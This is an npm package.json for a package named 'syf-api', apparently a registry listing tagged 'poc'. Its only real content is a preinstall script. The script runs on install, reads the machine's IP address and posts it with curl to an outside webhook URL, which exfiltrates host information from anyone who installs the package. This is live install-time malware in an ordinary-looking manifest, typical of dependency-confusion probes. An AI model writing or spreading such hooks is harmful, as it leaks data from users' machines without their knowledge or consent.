syf-api
Version:
16 lines (15 loc) • 383 B
JSON
{
"name": "syf-api",
"version": "1.0.0",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1",
"preinstall": "/usr/bin/curl --data \"ip=$(sh -c 'hostname -I | awk \"{print \\$1}\"')\" https://webhook-test.com/f7266edd650efc45713e1ed823f826c5"
},
"keywords": [
"poc"
],
"author": "",
"license": "ISC",
"description": ""
}